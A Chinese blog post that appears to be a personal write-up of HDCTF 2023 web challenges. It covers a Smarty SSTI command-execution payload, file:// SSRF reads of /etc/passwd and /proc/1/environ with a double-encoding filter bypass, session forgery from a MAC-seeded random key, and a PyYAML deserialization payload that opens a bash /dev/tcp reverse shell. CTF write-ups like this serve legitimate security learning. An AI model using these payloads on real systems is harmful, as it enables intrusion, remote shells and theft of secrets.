HDCTF2023复盘

已于 2023-05-08 15:32:11 修改
阅读量285 收藏
点赞数 1
分类专栏: ctfwp 文章标签: web安全
于 2023-04-23 21:53:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adorkablezhenbai/article/details/130329860
版权

比赛时思路还是太局限,做的时候感觉很懵

目录

Welcome To HDCTF 2023

SearchMaster已解决

YamiYami

Welcome To HDCTF 2023

web游戏类型,找js文件,本题是对关键信息做了jsfuck编码,这里贴一个ctf常见编码和特征的博客:

https://www.cnblogs.com/ruoli-s/p/14206145.html#js%E4%B8%93%E7%94%A8%E5%8A%A0%E5%AF%86

切入题目有两个方法:1.用爆破目录目录地址为:/composer.json;2.用报错(由于题目说了post一个data,于是post一个“data={”)

SearchMaster已解决

扫描:

报错:

 

 这里smarty模板是php的一个模板,参考:

(2条消息) Smarty SSTI_合天网安实验室的博客-CSDN博客

 使用{if}{/if}即可题目没有过滤

data={if system('cat /f*')}{/if}

YamiYami

 

打开页面以为会是ssrf读取目录结构+上传文件夹覆盖,但ssrf用的不好

(输入app发现还过滤app,以为这里是考点)

 可以用伪协议读取文件,

file:///etc/passwd

 

 过滤了flag和app

非预期解直接读环境下的flag:

?url=file:///proc/1/environ

预期解:

首先绕过过滤,通过url二次编码(使用burp,编码app/app.py)

?url=file:///%2561%2570%2570%252f%2561%2570%2570%252e%2570%2579

#encoding:utf-8 
import os 
import re, random, uuid from flask 
import * from werkzeug.utils 
import * import yaml from urllib.request 
import urlopen 
app = Flask(__name__) 
random.seed(uuid.getnode()) 
app.config['SECRET_KEY'] = str(random.random()*233) 
app.debug = False BLACK_LIST=["yaml","YAML","YML","yml","yamiyami"] 
app.config['UPLOAD_FOLDER']="/app/uploads" 
@app.route('/') 
def index(): 
    session['passport'] = 'YamiYami' 
    return ''' Welcome to HDCTF2023 Read somethings
Here is the challenge Upload file
Enjoy it pwd ''' 
@app.route('/pwd') 
def pwd(): 
    return str(pwdpath) 
@app.route('/read') 
def read(): 
    try: 
        url = request.args.get('url') 
        m = re.findall('app.*', url, re.IGNORECASE) 
        n = re.findall('flag', url, re.IGNORECASE) 
        if m: 
            return "re.findall('app.*', url, re.IGNORECASE)" 
        if n: return "re.findall('flag', url, re.IGNORECASE)" 
        res = urlopen(url) 
        return res.read() 
    except Exception as ex: 
        print(str(ex)) 
        return 'no response' 
def allowed_file(filename): 
        for blackstr in BLACK_LIST: 
            if blackstr in filename: 
                return False 
            return True 
@app.route('/upload', methods=['GET', 'POST']) 
def upload_file(): 
    if request.method == 'POST': 
        if 'file' not in request.files: 
            flash('No file part') 
            return redirect(request.url) 
        file = request.files['file'] 
        if file.filename == '': 
            return "Empty file" 
        if file and allowed_file(file.filename): 
            filename = secure_filename(file.filename) 
            if not os.path.exists('./uploads/'): 
                os.makedirs('./uploads/') 
                file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) 
                return "upload successfully!" 
            return render_template("index.html") 
@app.route('/boogipop') 
def load(): 
    if session.get("passport")=="Welcome To HDCTF2023": 
        LoadedFile=request.args.get("file") 
        if not os.path.exists(LoadedFile): 
            return "file not exists" 
        with open(LoadedFile) as f: yaml.full_load(f) f.close() 
        return "van you see" else: return "No Auth bro" 
        if __name__=='__main__': 
            pwdpath = os.popen("pwd").read() 
app.run( debug=False, host="0.0.0.0" ) 
print(app.config['SECRET_KEY'])

可以看到是伪随机生成,生成种子可以看到是uuid,而在 python 中使用 uuid 模块生成 UUID(通用唯一识别码)。可以使用 uuid.getnode() 方法来获取计算机的硬件地址,这个地址将作为 UUID 的一部分。

也就是linux中网卡,可以直接用?url=file:///sys/class/net/eth0/address

将读取出来的值,替换原脚本中的随机数种子也就能够伪造session了(坑点:uuid.getnode() 读出来是纯数字形式而这个显然是二进制,所以是0x0242ac025192)

yaml反序列化 :

YAML是一种直观的能够被电脑识别的的数据序列化格式,容易被人类阅读,并且容易和脚本语言交互,YAML类似于XML,但是语法比XML简单得多,对于转化成数组或可以hash的数据时是很简单有效的。

然后是抄网上的脚本:

!!python/object/new:str
    args: []
    state: !!python/tuple
         - "__import__('os').system('bash -c \"bash -i >& /dev/tcp/ip/port <&1\"')"
         - !!python/object/new:staticmethod
             args: []
             state:
                 update: !!python/name:eval
                 items: !!python/name:list

上传利用文件

打开相关接口:boogipop?file=uploads/3.txt,成功获得shell

 

ps:这里有个小插曲:本来反弹shell死活连不上,后面发现是vps的linux防火墙对应端口没开

iptables -I INPUT -p tcp --dport 9999 -j ACCEPT

最后仍然是/proc/1/environ

 

 

adorkablezhenbai
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KISS盘模型.xlsx
07-25
KISS盘模型.xlsx
MT4盘工具
11-27
关于MSCOMCT2.OCX控件不能识别使用的问题,我在网上找到相关文章但也未能成功,希望有成功的同学及时评论说明,网址在说明里
[HDCTF 2023]enc
liaochonxiang的博客
06-04 438
/注意修改为16进制,这样不会溢出,不会出错。第一种方法:smc自解密,再找到相对应的位置,按p转换成函数。密钥为v7和v8,注意看汇编代码,发现它俩的内存位置在一块。动调,运行到此处,再在反汇编窗口进行搜索”hdctf“按顺序理解,sub_411523函数为一个加密函数。可在反汇编窗口,通过搜索”hdctf“得到具体位置。跟进sub_411523—>sub_415100。先在smc函数解密后随便一个位置下断点。发现为一个XTEA加密。写idc脚本:进行解密。发现是一个smc加密。可知smc解密的位置。
[HDCTF 2023]ExtremeMisc WriteUp
baiqilolo的博客
04-23 617
注意,这个压缩包里面存在伪加密,需要先去除伪加密,再进行密码爆破。这个数据是每个字节内都颠倒了一下,如前四个字节原本应该是50 4B 03 04,这个压缩包的名字也给我们了提示,所以只要写个脚本让他们在字节内再次颠倒回去就行了。他会创建一个新的文件,下的文件里存放着颠倒后的十六进制数据,需要注意的是,处理前和处理后的数据都要经过在线网站的去空格和换行符这也是这个脚本的不足之处。拿到一个压缩包,里面有一个图片,解压。压缩包密码为:haida,将文件解压,发现解压出来的文件报错了。密码:w98d@ud。
[HDCTF 2023]easy_asm
最新发布
lzx13290757580的博客
04-29 108
HDCTF{Just_a_e3sy_aSm}
HDCTF2023 Writeup
S4n_v1的博客
04-23 2712
HDCTF2023 wp,pwn 全部,web 2/6,crypto 4/5,reverse 6/7,misc 3/5 题解。
HDCTF2023 WP
m0_68757308的博客
04-23 1136
HDCTF2023 WP
HDCTF_minions1
qq_51627915的博客
04-28 176
HDCTFpwn的minions1
MT4盘工具.zip
06-20
盘软件
盘大师1.0密匙
03-10
盘大师1.0版本的密匙。用于产生机器码,从而完成盘大师的注册和使用。
HDCTF 2023-省外赛道|MISC
zerorzeror的博客
04-23 890
HDCTF 2023-省外赛道|MISC
HDCTF 2023
weixin_63231007的博客
07-11 893
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 栈迁移&格式化字符串 crypto RSA
HDCTF2023 - Reverse方向全WP
Sciurdae的博客
11-20 888
不像是花指令,那应该就是SMC了,本来想用动调的,但这里加了反调试,不知道怎么去除,结合前面得到的key,找修改的地方。俩处加密,第一处对一句话进行一个f(x,y)的加密,这里加密用到了俩个伪随机数。再结合flag 为 28 位,可以得到,“I want to play basketballI w”再结合flag 为 28 位,可以得到,“I want to play basketballI w”之后,选中有用的数据U未定义一下,再P创建函数,F5反编译,得到。一个01背包问题,动态规划,写个EXP解决。
HDCTF2023】wp
leekos的博客,分享web安全相关知识~
04-24 1030
sql注入题目,username必须为admin,此处我们需要从密码着手。乍一看好像是一样的,但是单双引号有点区别,我们需要再套。发现很多 0、1的二进制数据,我们把它提取出来放到。于是我们写个脚本将这些16进制的转化为普通的文本文件。我们除了让输入的密码与真正的密码一致外,还可以让。实际上此处为一张空表,我们需要使用另一种做法(其实这里的密码是字母(以前一般都是数字),使用。得到一个wav音频和一张绿色的图片,我们使用。写这种编码转化的脚本不是很会,需要多学一学。
HDCTF 2023
arcuied
04-24 727
HDCTF2023 当时做了一半做不出来的题
2023 HDCTF --- Crypto wp
3tefanie丶zhou的博客
04-23 850
【无法挽留的很多人和事,那么能够留下来的,那就尽量都留下,长长久久,关起门来,仔细藏好,不为人知。】
2023HDCTF部分wp(pwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 927
HDCTF部分wp,指我a出来的
龙头盘神器excel
01-05
龙头盘神器excel,是指使用Excel软件进行股票投资交易的盘分析工具。它可以帮助投资者对自己的交易行为进行全面的分析和总结,在股票投资过程中起到很大的作用。 首先,龙头盘神器excel可以帮助投资者对自己的交易记录进行整理和分类,包括交易日期、买入价格、卖出价格、持仓时间等重要信息,有助于发现交易中的问题和不足之处。 其次,excel工具提供了丰富的数据分析功能,可以进行交易收益的统计和图表展示,帮助投资者清晰地了解自己的投资业绩,找出盈利和亏损的原因,为以后的投资决策提供参考依据。 另外,龙头盘神器excel还可以帮助投资者进行风险控制和策略优化。通过对交易数据的整理和分析,可以帮助投资者找到自身的交易特点和偏好,从而根据自己的风险承受能力和投资目标来制定更合理的投资策略,避免盲目冲动的交易行为。 总的来说,龙头盘神器excel是一款非常实用的股票投资盘工具,能够帮助投资者提高交易记录的整理和分析效率,更好地总结和反思自己的交易行为,为未来的投资决策提供更科学的依据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值